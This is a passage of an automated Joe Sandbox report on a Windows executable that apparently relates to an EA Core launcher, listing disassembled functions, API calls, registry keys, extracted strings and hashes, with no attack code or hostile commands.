                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                  • API String ID: 3698121176-3819984048
                                                                  • Opcode ID: b28ab0302830108e0582c0ac885daa21842f7bb8de2b3c263851f268a6a83a45
                                                                  • Instruction ID: 914d0277f797a2f4816733ac280e4db07d06b593b3d291f74573943c4e1e268e
                                                                  • Opcode Fuzzy Hash: b28ab0302830108e0582c0ac885daa21842f7bb8de2b3c263851f268a6a83a45
                                                                  • Instruction Fuzzy Hash: C031737190C2209AD720AF75BC06B6A3EA5AF45360715967BE800D33B0DBBAD841CF5C
                                                                  Function 00416888 Relevance: 21.1, APIs: 14, Instructions: 82COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _free.LIBCMT ref: 00416888
                                                                    • Part of subcall function 0041444C: HeapFree.KERNEL32(00000000,00000000,?,00416832,00000000,?,?,00414408,004136EF), ref: 00414462
                                                                    • Part of subcall function 0041444C: GetLastError.KERNEL32(00000000,?,00416832,00000000,?,?,00414408,004136EF), ref: 00414474
                                                                  • _free.LIBCMT ref: 00416896
                                                                  • _free.LIBCMT ref: 004168A4
                                                                  • _free.LIBCMT ref: 004168B2
                                                                  • _free.LIBCMT ref: 004168C0
                                                                  • _free.LIBCMT ref: 004168CE
                                                                  • _free.LIBCMT ref: 004168DF
                                                                  • __lock.LIBCMT ref: 004168E7
                                                                  • InterlockedDecrement.KERNEL32(?), ref: 004168F9
                                                                  • _free.LIBCMT ref: 0041690C
                                                                  • __lock.LIBCMT ref: 00416920
                                                                  • ___removelocaleref.LIBCMT ref: 00416935
                                                                  • ___freetlocinfo.LIBCMT ref: 00416951
                                                                  • _free.LIBCMT ref: 00416964
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: _free$__lock$DecrementErrorFreeHeapInterlockedLast___freetlocinfo___removelocaleref
                                                                  • String ID:
                                                                  • API String ID: 829874470-0
                                                                  • Opcode ID: 3b1cb0cbd6c1d9e81b3a1f771ab6ccc93afb538172364e193a824c50ba1e1e20
                                                                  • Instruction ID: 8c3e26e593937771846b6c374c4ed5737222b072e88b7e4844ed73f8815af00e
                                                                  • Opcode Fuzzy Hash: 3b1cb0cbd6c1d9e81b3a1f771ab6ccc93afb538172364e193a824c50ba1e1e20
                                                                  • Instruction Fuzzy Hash: 072160B22052005BDA247BBAA4457AF63E86F84728B2A851FF40497291DF3CE9C0852D
                                                                  Function 0041F469 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 226COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0041F47B
                                                                    • Part of subcall function 00413492: __getptd.LIBCMT ref: 004134A5
                                                                    • Part of subcall function 00414403: __getptd_noexit.LIBCMT ref: 00414403
                                                                  • __shift.LIBCMT ref: 0041F4E9
                                                                  • _strcpy_s.LIBCMT ref: 0041F53D
                                                                  • _memmove.LIBCMT ref: 0041F5A1
                                                                  • __invoke_watson.LIBCMT ref: 0041F5C4
                                                                  • __fltout2.LIBCMT ref: 0041F5F9
                                                                    • Part of subcall function 00420C33: ___dtold.LIBCMT ref: 00420C59
                                                                    • Part of subcall function 00420C33: _$I10_OUTPUT.LIBCMT ref: 00420C74
                                                                    • Part of subcall function 00420C33: _strcpy_s.LIBCMT ref: 00420C94
                                                                  • __fptostr.LIBCMT ref: 0041F657
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: Locale_strcpy_s$I10_UpdateUpdate::____dtold__fltout2__fptostr__getptd__getptd_noexit__invoke_watson__shift_memmove
                                                                  • String ID: -$e+000
                                                                  • API String ID: 2872883240-1412363215
                                                                  • Opcode ID: 80bbff2313622aef98a3b749ba6f0eed36fbf8023f7dfeddaf6998f980f6238c
                                                                  • Instruction ID: c60df709e1acc720f731806fd25f3312cafaa5f327fe4214f5e428acaeea59b3
                                                                  • Opcode Fuzzy Hash: 80bbff2313622aef98a3b749ba6f0eed36fbf8023f7dfeddaf6998f980f6238c
                                                                  • Instruction Fuzzy Hash: 1B711472600345AFCB15DF78CC81AEB7BA5AF44314F18857FE4129B282D338D986C755
                                                                  Function 00404010 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 200processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00412E30: RegOpenKeyW.ADVAPI32(80000002,SOFTWARE\Electronic Arts\EA Core,9C2039C9), ref: 00412E93
                                                                    • Part of subcall function 00412E30: RegQueryValueExW.ADVAPI32(9C2039C9,00000000,00000000,?,00000000,00000000,?,00000000,9C2039C9,00000000), ref: 00412EB9
                                                                    • Part of subcall function 00412E30: RegQueryValueExW.ADVAPI32(9C2039C9,00000000,00000000,?,00000000,00000000,80070057,?,00000000,9C2039C9,00000000), ref: 00412F19
                                                                  • __wcsicoll.LIBCMT ref: 004040D6
                                                                  • PathFileExistsW.SHLWAPI(?), ref: 0040416E
                                                                    • Part of subcall function 00401000: __CxxThrowException@8.LIBCMT ref: 00401012
                                                                  • GetStartupInfoW.KERNEL32(?), ref: 004041A8
                                                                  • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 004041C8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: QueryValue$CreateException@8ExistsFileInfoOpenPathProcessStartupThrow__wcsicoll
                                                                  • String ID: ClientPath$ClientVersion$D$TASK_LAUNCH_VAULT$taskId
                                                                  • API String ID: 250433368-3794618676
                                                                  • Opcode ID: 08c08dd2a7f5c98b7fc6987f10198b84985c4a5a63c51848e293be478a0b1cbe
                                                                  • Instruction ID: 76b1966acc7033ab64905c1a3fd4d20a6124fa36ab320636d25b5177588580d5
                                                                  • Opcode Fuzzy Hash: 08c08dd2a7f5c98b7fc6987f10198b84985c4a5a63c51848e293be478a0b1cbe
                                                                  • Instruction Fuzzy Hash: 2A71C270A00604DFDB00DFA8C885B9EB7B4FF99324F148269E525AB3E1D7399A45CB94
                                                                  Function 00405D40 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 336COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                  • std::exception::exception.LIBCMT ref: 004060D2
                                                                  • __CxxThrowException@8.LIBCMT ref: 004060E7
                                                                    • Part of subcall function 00401850: _memmove_s.LIBCMT ref: 004018C7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: Exception@8Throw_malloc_memmove_sstd::exception::exception
                                                                  • String ID: %I64d$%lu$CommandIndex$PrevCommand$xsB
                                                                  • API String ID: 1860171432-3474438254
                                                                  • Opcode ID: 96eaf29f573fc05d54491307b7f3db57108491e08cc3f2a4a95e96654d7aa1aa
                                                                  • Instruction ID: c5004cb68efb67194c6f87c48ca3711ded65f2a9143ef5647ee9976fbfe6ad8a
                                                                  • Opcode Fuzzy Hash: 96eaf29f573fc05d54491307b7f3db57108491e08cc3f2a4a95e96654d7aa1aa
                                                                  • Instruction Fuzzy Hash: A3D19171A00605DFDB04DF9DC880AAEB7B5FF88314F24826AE515AB391D738AE05CB95
                                                                  Function 00404260 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 221COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsicoll
                                                                  • String ID: Console added to log output$Could not add file %s to log$File %s added to log$console$false$file
                                                                  • API String ID: 3832890014-2584448219
                                                                  • Opcode ID: 1a08a012ac65999c8174157735e916b28457271b0fadf02bb8d59d74e1470fdb
                                                                  • Instruction ID: a8fcaa21e284d30e8fecf8c9f0b476e71f75c2b91a7b52cfa491ca81cfd6bdde
                                                                  • Opcode Fuzzy Hash: 1a08a012ac65999c8174157735e916b28457271b0fadf02bb8d59d74e1470fdb
                                                                  • Instruction Fuzzy Hash: BC81B971600605DFDB04DB68C841B9EB7B5FF85324F14836EE525AB3E1D734A905CBA4
                                                                  Function 00412E30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 118registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyW.ADVAPI32(80000002,SOFTWARE\Electronic Arts\EA Core,9C2039C9), ref: 00412E93
                                                                  • RegQueryValueExW.ADVAPI32(9C2039C9,00000000,00000000,?,00000000,00000000,?,00000000,9C2039C9,00000000), ref: 00412EB9
                                                                  • RegQueryValueExW.ADVAPI32(9C2039C9,00000000,00000000,?,00000000,00000000,80070057,?,00000000,9C2039C9,00000000), ref: 00412F19
                                                                    • Part of subcall function 00401000: __CxxThrowException@8.LIBCMT ref: 00401012
                                                                  • _wcsnlen.LIBCMT ref: 00412F30
                                                                  • RegCloseKey.ADVAPI32(9C2039C9,?,00000000,9C2039C9,00000000), ref: 00412F52
                                                                  Strings
                                                                  • SOFTWARE\Electronic Arts\EA Core, xrefs: 00412E7B
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: QueryValue$CloseException@8OpenThrow_wcsnlen
                                                                  • String ID: SOFTWARE\Electronic Arts\EA Core
                                                                  • API String ID: 922926716-227494909
                                                                  • Opcode ID: 75133fe29f0d75d512c43b9e2b8e0231faae1fa167434d0b11c600b6562343be
                                                                  • Instruction ID: 7a639c6b66232bf2a509c11970b60c131960bb7f6978763a11664d3db71cf0c1
                                                                  • Opcode Fuzzy Hash: 75133fe29f0d75d512c43b9e2b8e0231faae1fa167434d0b11c600b6562343be
                                                                  • Instruction Fuzzy Hash: 134179B1A00209AFDB10DF99DD84AAEF7F9FF88314F20496EE505E7250D778A9418B94
                                                                  Function 00401D00 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 107COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                  • std::exception::exception.LIBCMT ref: 00401DE6
                                                                  • __CxxThrowException@8.LIBCMT ref: 00401DFB
                                                                  • std::exception::exception.LIBCMT ref: 00401E0A
                                                                  • __CxxThrowException@8.LIBCMT ref: 00401E1F
                                                                    • Part of subcall function 00413B9C: std::exception::exception.LIBCMT ref: 00413BEB
                                                                    • Part of subcall function 00413B9C: std::exception::exception.LIBCMT ref: 00413C05
                                                                    • Part of subcall function 00413B9C: __CxxThrowException@8.LIBCMT ref: 00413C16
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                  • String ID: xsB$xsB
                                                                  • API String ID: 2621100827-68959868
                                                                  • Opcode ID: 8215094215c13d6a3dcd50be55ae5cf5bf2f7228950e984a2d85efd7248c176d
                                                                  • Instruction ID: 778eb612fba3b6ce96523c047d895c47cfc0f6d1dfa00d93fd7411120063d9d5
                                                                  • Opcode Fuzzy Hash: 8215094215c13d6a3dcd50be55ae5cf5bf2f7228950e984a2d85efd7248c176d
                                                                  • Instruction Fuzzy Hash: DE4159B5A406048FC710CF69D880A9AFBF0FF98314B54C66FE85997741E738EA04CBA5
                                                                  Function 00404DE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 103COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                  • std::exception::exception.LIBCMT ref: 00404E99
                                                                  • __CxxThrowException@8.LIBCMT ref: 00404EAE
                                                                  • std::exception::exception.LIBCMT ref: 00404EBD
                                                                  • __CxxThrowException@8.LIBCMT ref: 00404ED2
                                                                    • Part of subcall function 00413B9C: std::exception::exception.LIBCMT ref: 00413BEB
                                                                    • Part of subcall function 00413B9C: std::exception::exception.LIBCMT ref: 00413C05
                                                                    • Part of subcall function 00413B9C: __CxxThrowException@8.LIBCMT ref: 00413C16
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                  • String ID: xsB$xsB
